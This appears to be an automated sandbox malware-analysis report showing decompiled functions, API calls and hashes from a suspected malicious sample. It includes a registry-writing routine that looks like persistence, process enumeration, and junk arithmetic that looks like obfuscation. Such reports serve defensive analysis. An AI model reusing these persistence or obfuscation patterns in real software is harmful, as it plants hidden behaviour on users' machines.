0x00392fe2
0x00000000
0x00392fe2
0x00392fb0
0x00392fb2
0x00000000
0x00392fb9
0x00392fc1
0x00392fd1
0x00000000
0x00392fd9
0x00392fe3
0x00392fe4
0x00392fe4
0x00392fea
0x00392ff1
0x00392fff
0x00393003
0x00393006
0x00393012
0x00393018
0x00393022

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00392EEF
Process32First.KERNEL32(00000000,?), ref: 00392F37
Process32Next.KERNEL32(00000000,00000128), ref: 00392FCB
CloseHandle.KERNEL32(00000000), ref: 00392FE4

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 13f85ac6b85bd084e5ca7837c6cb2f7ee3d4f15ea6c2241a5ac91981601eac00
Instruction ID: 5bd246b6003e8af472f238a1a09ad77cc4324d025ea5597707296d9aefcab9fd
Opcode Fuzzy Hash: 13f85ac6b85bd084e5ca7837c6cb2f7ee3d4f15ea6c2241a5ac91981601eac00
Instruction Fuzzy Hash: 7651D271901519EBDB12DF60ED88BFEBBB8FB45300F154095D885E2364E7356A68CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00386A90 Relevance: 6.1, APIs: 4, Instructions: 130
registryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00386A90(char* _a4) {
				void* _v8;
				signed char _v12;
				long long _v16;
				long long _v24;
				intOrPtr _t23;
				signed char _t25;
				long _t28;
				signed char _t30;
				char* _t35;
				short _t38;
				char _t42;
				char* _t43;
				short _t46;
				char* _t47;
				void* _t50;
				char* _t56;
				intOrPtr _t67;
				long long _t69;
				intOrPtr _t71;
				intOrPtr _t76;

				 *0x3ce268 =  *0x3ce268 + 1;
				_t23 =  *0x3ce268; // 0xd18b
				_t38 =  *0x3ce49c; // 0x3b0d
				_t25 = _t38 - _t23 - 0x3418d07c;
				 *0x3ce29c =  *0x3ce29c + _t25;
				 *0x3ce49c =  *0x3ce49c - 1;
				_t50 = 0x80000002;
				if( *0x3d030c == 0) {
					_t50 = 0x80000001;
					asm("fld1");
					asm("fsubp st2, st0");
					asm("fxch st0, st1");
					 *0x3ce168 = st0;
					_v16 =  *0x3ce168;
					_t67 =  *0x3ce068 + _v16 -  *0x3c7a88;
					asm("fcomp qword [0x3c7a80]");
					asm("fnstsw ax");
					_t62 = _t25 & 0x00000005;
					if((_t25 & 0x00000005) != 0) {
						st0 = _t67;
					} else {
						_v16 =  *0x3ce500 -  *0x3c7a78;
						_v16 =  *0x3ce248 + _v16;
						_t67 =  *0x3ce5e0 + _v16;
						 *0x3ce5e0 = _t67;
						asm("fsubr dword [0x3ce248]");
						 *0x3ce248 = _t67;
					}
				}
				_t28 = RegOpenKeyA(_t50, E0038CF90(_t62, _t67, 0x3158, 0x2e),  &_v8);
				E00396570(0x2e, _t26);
				if(_t28 != 0) {
					L8:
					asm("fld1");
					_t69 =  *0x3ce480 - st0;
					asm("fxch st0, st1");
					 *0x3ce480 = _t69;
					_t30 =  *0x3ce4f4; // 0x5f03
					_v12 = _t30;
					asm("fild dword [ebp-0x8]");
					_v16 = _t69;
					 *0x3ce4f4 =  *0x3ce4f4 + 1;
					asm("fsubr qword [ebp-0xc]");
					_t71 =  *0x3ce480 -  *0x3c7a70;
					asm("fcomp qword [0x3c7a68]");
					asm("fnstsw ax");
					if((_t30 & 0x00000005) != 0) {
						st0 = _t71;
						return RegCloseKey(_v8);
					} else {
						_t46 =  *0x3ce508; // 0x8dea
						_v12 = _t46;
						_v24 =  *0x3ce148 -  *0x3ce054 -  *0x3c7a60;
						asm("fild dword [ebp-0x8]");
						 *0x3ce508 = E0039CABC();
						_t76 =  *0x3ce054;
						asm("fld1");
						asm("fsubp st1, st0");
						 *0x3ce054 = _t76;
						 *0x3ce148 = _t76 +  *0x3ce148;
						return RegCloseKey(_v8);
					}
				}
				_t47 = _a4;
				_t35 = _t47;
				_t12 =  &(_t35[1]); // 0x383cf8
				_t56 = _t12;
				do {
					_t42 =  *_t35;
					_t35 =  &(_t35[1]);
				} while (_t42 != 0);
				_t43 =  *0x3d04b8; // 0x2d81100
				RegSetValueExA(_v8, _t43, 0, 1, _t47, _t35 - _t56);
				goto L8;
			}

0x00386a93
0x00386a9a
0x00386aa0
0x00386ab0
0x00386ab6
0x00386abc
0x00386acc
0x00386ad1
0x00386ad9
0x00386ade
0x00386ae2
0x00386ae4
0x00386ae6
0x00386af2
0x00386afe
0x00386b04
0x00386b0a
0x00386b0c
0x00386b0f
0x00386b49
0x00386b11
0x00386b1d
0x00386b29
0x00386b32
0x00386b35
0x00386b3b
0x00386b41
0x00386b41
0x00386b0f
0x00386b62
0x00386b6d
0x00386b77
0x00386ba1
0x00386ba8
0x00386bab
0x00386bad
0x00386baf
0x00386bb5
0x00386bbe
0x00386bc1
0x00386bc4
0x00386bcd
0x00386bd4
0x00386bd7
0x00386bdd
0x00386be3
0x00386be8
0x00386c4a
0x00386c56
0x00386bea
0x00386bf6
0x00386c00
0x00386c09
0x00386c0c
0x00386c17
0x00386c1d
0x00386c23
0x00386c25
0x00386c27
0x00386c37
0x00386c46
0x00386c46
0x00386be8
0x00386b79
0x00386b7c
0x00386b7e
0x00386b7e
0x00386b81
0x00386b81
0x00386b83
0x00386b84
0x00386b88
0x00386b9b
0x00000000

APIs

RegOpenKeyA.ADVAPI32(80000002,00000000,?), ref: 00386B62
RegSetValueExA.ADVAPI32(?,02D81100,00000000,00000001,00383CF7,00383CF8,?,?,?,?,?,?,?,00383CF7,?), ref: 00386B9B
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00383CF7,?), ref: 00386C3D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00383CF7,?), ref: 00386C4D

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: Close$OpenValue
String ID:
API String ID: 3951040859-0
Opcode ID: 28dfa12471c2dd8b4d739fab94df4d0de50df820f2ecd9484e71e31d3a81def7
Instruction ID: a9873a10b9263ac71ab3354201b6defc364930238b29cdbb62026d293fc49bac
Opcode Fuzzy Hash: 28dfa12471c2dd8b4d739fab94df4d0de50df820f2ecd9484e71e31d3a81def7
Instruction Fuzzy Hash: F0412575D01608E7DB0BAF62FD49EA93B7CFB85311F224485E881E2274EB346674CB40

Uniqueness

Uniqueness Score: -1.00%

Function 003B4678 Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E003B4678(void* __edx, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E0039EE17( &_v20, __edx, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E003B47A8( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0039FA66(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x003b4682
0x003b4689
0x003b46a0
0x00000000
0x003b4690
0x003b4692
0x003b46ac
0x003b46b1
0x003b46b4
0x003b46b7
0x003b46df
0x003b46e6
0x003b46e8
0x003b4769
0x003b4784
0x003b4786
0x003b46c6
0x003b46c6
0x003b46c9
0x003b46cb
0x003b46ce
0x003b46ce
0x003b46ce
0x003b46ce
0x00000000
0x003b46d4
0x003b4748
0x003b4748
0x003b474d
0x003b4753
0x003b4756
0x003b4758
0x003b475b
0x003b475b
0x003b475b
0x003b475b
0x00000000
0x003b475f
0x003b46ea
0x003b46ed
0x003b46f3
0x003b46f6
0x003b471d
0x003b4720
0x003b4726
0x00000000
0x00000000
0x003b4728
0x003b472b
0x00000000
0x00000000
0x003b472d
0x003b472d
0x003b4733
0x003b4736
0x003b46a5
0x003b46a5
0x003b473f
0x00000000
0x003b473f
0x003b46f8
0x003b46fb
0x00000000
0x00000000
0x003b46ff
0x003b4710
0x003b4716
0x003b4718
0x003b471b
0x00000000
0x00000000
0x00000000
0x003b471b
0x003b46b9
0x003b46bc
0x003b46be
0x003b46c3
0x003b46c3
0x00000000
0x003b4694
0x003b4694
0x003b4699
0x003b469d
0x003b469d
0x00000000
0x003b4699
0x003b4692

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003B46AC
__isleadbyte_l.LIBCMT ref: 003B46DF
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000F11,00000000,?,?,?,00000104,oW8,00000F11), ref: 003B4710
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000F11,00000000,?,?,?,00000104,oW8,00000F11), ref: 003B477E

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2b6e0a4baa06b8b208b24f3e1280da6e0ef44838883f80db6d6e84b63e20e182
Instruction ID: 52cb73249603914a3ff3c72f885d1be1593793519fce5f0a6b079e9e4fecdeb5
Opcode Fuzzy Hash: 2b6e0a4baa06b8b208b24f3e1280da6e0ef44838883f80db6d6e84b63e20e182
Instruction Fuzzy Hash: 0431E331A00249EFCF12DF64C881EFE3BA5BF02318F1685A9E6A18B992D730DD40DB55

Uniqueness

Uniqueness Score: -1.00%

Function 0038BA80 Relevance: 6.1, APIs: 4, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0038BA80(intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12) {
				long long _v12;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				short _t20;
				intOrPtr _t38;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				short _t49;
				intOrPtr _t52;
				intOrPtr* _t54;
				intOrPtr* _t56;
				long long _t72;

				 *0x3ce34c =  *0x3ce34c + 0xc8af7e23;
				_t52 = _a12;
				if(_t52 == 0xffffffff) {
					_t54 = _a8;
					_t3 = _t54 + 1; // 0x1
					_t46 = _t3;
					do {
						_t19 =  *_t54;
						_t54 = _t54 + 1;
					} while (_t19 != 0);
					_t52 = _t54 - _t46;
				}
				if(_t52 > 0) {
					_t20 =  *0x3ce0bc; // 0xdec
					_t47 =  *0x3ce45c; // 0x3519d6c0
					 *0x3ce0c4 =  *0x3ce0c4 + 0x1159f68f - _t20 + _t47;
					 *0x3ce0bc =  *0x3ce0bc + 1;
					_t56 = _a4;
					if( *_t56 != 0) {
						_t38 = E0039CBC4(_t47, _t52, _t56,  *((intOrPtr*)(_t56 + 4)) + _t52);
						E0039C200(_t38,  *_t56,  *((intOrPtr*)(_t56 + 4)));
						E0039C990( *_t56, 0,  *((intOrPtr*)(_t56 + 4)));
						_t49 =  *0x3ce508; // 0x8dea
						_a12 = _t49;
						_v12 =  *0x3ce60c -  *0x3c75e8;
						asm("fild dword [ebp+0x10]");
						 *0x3ce508 = E0039CABC();
						asm("fld1");
						asm("fsubp st1, st0");
						E0039CB4B( *_t56);
						 *_t56 = _t38;
						_t19 = E0039C200( *((intOrPtr*)(_t56 + 4)) + _t38, _a8, _t52);
						 *((intOrPtr*)(_t56 + 4)) =  *((intOrPtr*)(_t56 + 4)) + _t52;
					} else {
						 *_t56 = E0039CBC4(_t47, _t52, _t56, _t52);
						 *((intOrPtr*)(_t56 + 4)) = _t52;
						_t19 = E0039C200(_t36, _a8, _t52);
					}
					_t72 =  *0x3ce1e4;
					_t43 =  *0x3ce530; // 0xd924f815
					_v12 = _t72;
					_a12 = _t43 - 0x28cd55a7;
					asm("fild dword [ebp+0x10]");
					asm("fsubr qword [ebp-0x8]");
					 *0x3ce1e4 = _t72;
				}
				return _t19;
			}

0x0038ba83
0x0038ba91
0x0038ba97
0x0038ba99
0x0038ba9c
0x0038ba9c
0x0038baa0
0x0038baa0
0x0038baa2
0x0038baa3
0x0038baa7
0x0038baa7
0x0038baab
0x0038bab1
0x0038bab7
0x0038bac9
0x0038bacf
0x0038bad7
0x0038badd
0x0038bb0b
0x0038bb13
0x0038bb21
0x0038bb2c
0x0038bb3c
0x0038bb3f
0x0038bb42
0x0038bb4d
0x0038bb59
0x0038bb5b
0x0038bb66
0x0038bb76
0x0038bb78
0x0038bb80
0x0038badf
0x0038baeb
0x0038baed
0x0038baf0
0x0038baf5
0x0038bb84
0x0038bb8a
0x0038bb96
0x0038bb99
0x0038bb9c
0x0038bba0
0x0038bba3
0x0038bba3
0x0038bbad

APIs

_malloc.LIBCMT ref: 0038BAE0
_malloc.LIBCMT ref: 0038BB04
_memset.LIBCMT ref: 0038BB21
_free.LIBCMT ref: 0038BB66

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: _malloc$_free_memset
String ID:
API String ID: 1978200242-0
Opcode ID: f15be2cb43963699773137a7337cb86bdbfa3752ed6fbf8ba24603eea7b3a7f8
Instruction ID: b1d01f87c9d9e0641f684365dba39c2b4fe862fcb0cb7b4f50057331708e2a6c
Opcode Fuzzy Hash: f15be2cb43963699773137a7337cb86bdbfa3752ed6fbf8ba24603eea7b3a7f8
Instruction Fuzzy Hash: 2A31DC76510245DBCB16EF69EC85DAABBBDFB94310F11890EF895C3250DB34A910CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00396E90 Relevance: 6.1, APIs: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00396E90(intOrPtr _a4, signed int _a8) {
				long long _v12;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t38;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t48;

				_t20 = _a8;
				_t48 = _a4;
				 *0x3ce5e8 =  *0x3ce5e8 +  *0x3c7790;
				_push(_t43);
				if( *(_t48 + 4) >= _t20) {
					L6:
					return 0;
				} else {
					_t32 = _t20 * 4;
					_t45 = E0039CBC4(_t38, _t43, _t48, _t20 * 4);
					if(_t45 != 0) {
						E0039C990(_t45, 0, _t32);
						_t24 =  *((intOrPtr*)(_t48 + 8));
						if( *((intOrPtr*)(_t48 + 8)) != 0) {
							E0039C200(_t45, _t24,  *(_t48 + 4) +  *(_t48 + 4) +  *(_t48 + 4) +  *(_t48 + 4));
							 *0x3ce070 =  *0x3ce070 -  *0x3c7788;
							E0039C990( *((intOrPtr*)(_t48 + 8)), 0,  *(_t48 + 4) +  *(_t48 + 4) +  *(_t48 + 4) +  *(_t48 + 4));
							_v12 =  *0x3ce220 +  *0x3c7780;
							 *0x3ce3c8 =  *0x3ce3c8 + _v12;
							E0039CB4B( *((intOrPtr*)(_t48 + 8)));
							_v12 =  *0x3ce078 -  *0x3c7778;
							_v12 =  *0x3ce3d8 + _v12;
							 *0x3ce074 =  *0x3ce074 + _v12;
							 *0x3ce3d8 =  *0x3ce3d8 -  *0x3c75c8;
						}
						 *(_t48 + 4) = _a8;
						 *((intOrPtr*)(_t48 + 8)) = _t45;
						goto L6;
					} else {
						_t5 = _t45 + 1; // 0x1
						return _t5;
					}
				}
			}

0x00396e99
0x00396ea7
0x00396eaa
0x00396eb0
0x00396eb4
0x00396f94
0x00396f9c
0x00396eba
0x00396eba
0x00396ec7
0x00396ece
0x00396ede
0x00396ee3
0x00396eeb
0x00396efb
0x00396f0c
0x00396f20
0x00396f31
0x00396f3d
0x00396f47
0x00396f5b
0x00396f67
0x00396f73
0x00396f85
0x00396f85
0x00396f8e
0x00396f91
0x00000000
0x00396ed0
0x00396ed0
0x00396ed9
0x00396ed9
0x00396ece

APIs

_malloc.LIBCMT ref: 00396EC2

Part of subcall function 0039CBC4: __FF_MSGBANNER.LIBCMT ref: 0039CBDD
Part of subcall function 0039CBC4: __NMSG_WRITE.LIBCMT ref: 0039CBE4
Part of subcall function 0039CBC4: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003B1B2D,00000000,00000001,00000000,?,003A2770,00000018,003CBCE0,0000000C,003A2800), ref: 0039CC09

_memset.LIBCMT ref: 00396EDE
_memset.LIBCMT ref: 00396F20
_free.LIBCMT ref: 00396F47

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: _memset$AllocateHeap_free_malloc
String ID:
API String ID: 585861054-0
Opcode ID: 86e08c2547bc5e132e0aa2b8aa0a627e0d79648b425a67865e4842f3ed344905
Instruction ID: fe9e9c2675a2b00f7b103d7986b50c1b3e8c3e019e1a98df4aade8ad57043e3c
Opcode Fuzzy Hash: 86e08c2547bc5e132e0aa2b8aa0a627e0d79648b425a67865e4842f3ed344905
Instruction Fuzzy Hash: 8931B135510A08DBEB029F56FC85E6ABBBCFBC8311F114599E88983214DB35B9B4C751

Uniqueness

Uniqueness Score: -1.00%

Function 0039F92E Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0039F92E(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t29;

				_t29 = __edx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0039F1C3(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0039F2AA(_t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0039F821(__ebx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0039F743(__ebx, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x0039f92e
0x0039f933
0x0039f939
0x0039f9ac
0x00000000
0x0039f940
0x0039f940
0x0039f943
0x0039f95e
0x0039f961
0x0039f981
0x0039f993
0x0039f963
0x0039f963
0x0039f966
0x00000000
0x0039f968
0x0039f97a
0x0039f97a
0x0039f966
0x0039f9b1
0x0039f9b5
0x0039f945
0x0039f95d
0x0039f95d
0x0039f943

APIs

__cftof_l.LIBCMT ref: 0039F954

Part of subcall function 0039F743: __fltout2.LIBCMT ref: 0039F76E

__cftog_l.LIBCMT ref: 0039F97A
__cftoe_l.LIBCMT ref: 0039F9AC

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
Instruction ID: 13f4aacf6bdc901777865efbd49e61d4124d1737107f710112d1eda4dec14ecd
Opcode Fuzzy Hash: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
Instruction Fuzzy Hash: 4711483640414AFFCF135E84CC42DEE3F66BB58354B5A8425FE2899031C336C9B2AB81

Uniqueness

Uniqueness Score: -1.00%

Function 003A6560 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E003A6560(void* __edx, void* __edi, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v24;
				signed int _v28;
				void _v32;
				signed int _v36;
				void* _t20;
				signed int _t21;
				void* _t26;
				signed int _t31;
				void* _t35;
				void* _t39;
				void* _t41;

				_t35 = __edx;
				_v36 = _v36 & 0x00000000;
				_t31 = 7;
				_t20 = memset( &_v32, 0, _t31 << 2);
				_pop(_t39);
				_t46 = _a8 - _t20;
				if(_a8 != _t20) {
					_t21 = _a4;
					__eflags = _t21;
					if(__eflags == 0) {
						goto L1;
					} else {
						_v28 = _t21;
						_v36 = _t21;
						_v32 = 0x7fffffff;
						_v24 = 0x42;
						_t26 = E003A305E(_t35,  &_v36, _a8, _a12, _a16);
						_t15 =  &_v32;
						 *_t15 = _v32 - 1;
						__eflags =  *_t15;
						_t41 = _t26;
						if( *_t15 < 0) {
							E003A63FC(_t35, _t39, 0,  &_v36);
						} else {
							 *_v36 = 0;
						}
						return _t41;
					}
				} else {
					L1:
					 *((intOrPtr*)(E0039FA66(_t46))) = 0x16;
					return E0039C1AB() | 0xffffffff;
				}
			}

0x003a6560
0x003a6568
0x003a656f
0x003a6575
0x003a6577
0x003a6578
0x003a657b
0x003a6592
0x003a6595
0x003a6597
0x00000000
0x003a6599
0x003a659d
0x003a65a3
0x003a65ad
0x003a65b4
0x003a65bb
0x003a65c3
0x003a65c3
0x003a65c3
0x003a65c6
0x003a65c8
0x003a65d8
0x003a65ca
0x003a65cd
0x003a65cd
0x003a65e3
0x003a65e3
0x003a657d
0x003a657d
0x003a6582
0x003a6591
0x003a6591

APIs

__output_l.LIBCMT ref: 003A65BB

Part of subcall function 0039FA66: __getptd_noexit.LIBCMT ref: 0039FA66

Strings

B, xrefs: 003A65B4

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: __getptd_noexit__output_l
String ID: B
API String ID: 2141734944-1255198513
Opcode ID: 6f8002b68bf60a7fd0f5846207362007941de7182ff8108cc2b95ed3867cc4cd
Instruction ID: 7acb03aa38a042d32a0b6d6e679056284ec88e9ebc1a3e1395f51d9b87422533
Opcode Fuzzy Hash: 6f8002b68bf60a7fd0f5846207362007941de7182ff8108cc2b95ed3867cc4cd
Instruction Fuzzy Hash: C7018471D002199FDF11DFA4CC02BEE7BB8FB06364F144115F924AA2D1E7749601CB65

Uniqueness

Uniqueness Score: -1.00%

Function 003BD896 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E003BD896(void* __ebx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t27;
				void* _t28;

				_t27 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t28 - 0x24));
				E003B5CD9(__eflags,  *((intOrPtr*)(_t28 - 0x28)));
				 *((intOrPtr*)(E0039FFF2(__ebx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t28 - 0x2c));
				_t17 = E0039FFF2(__ebx, __edi, __eflags);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t28 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t28 - 0x34)) == 0) {
							_t36 =  *((intOrPtr*)(_t28 - 0x1c));
							if( *((intOrPtr*)(_t28 - 0x1c)) != 0) {
								_t17 = E003B5CB2(_t36,  *((intOrPtr*)(_t27 + 0x18)));
								_t37 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t28 + 0x10)));
									_push(_t27);
									return E003BD24A(_t37);
								}
							}
						}
					}
				}
				return _t17;
			}

0x003bd896
0x003bd899
0x003bd89f
0x003bd8ad
0x003bd8b3
0x003bd8bb
0x003bd8c7
0x003bd8cf
0x003bd8d7
0x003bd8eb
0x003bd8ed
0x003bd8f1
0x003bd8f6
0x003bd8fc
0x003bd8fe
0x003bd900
0x003bd903
0x00000000
0x003bd90a
0x003bd8fe
0x003bd8f1
0x003bd8eb
0x003bd8d7
0x003bd90b

APIs

Part of subcall function 003B5CD9: __getptd.LIBCMT ref: 003B5CDF
Part of subcall function 003B5CD9: __getptd.LIBCMT ref: 003B5CEF

__getptd.LIBCMT ref: 003BD8A5

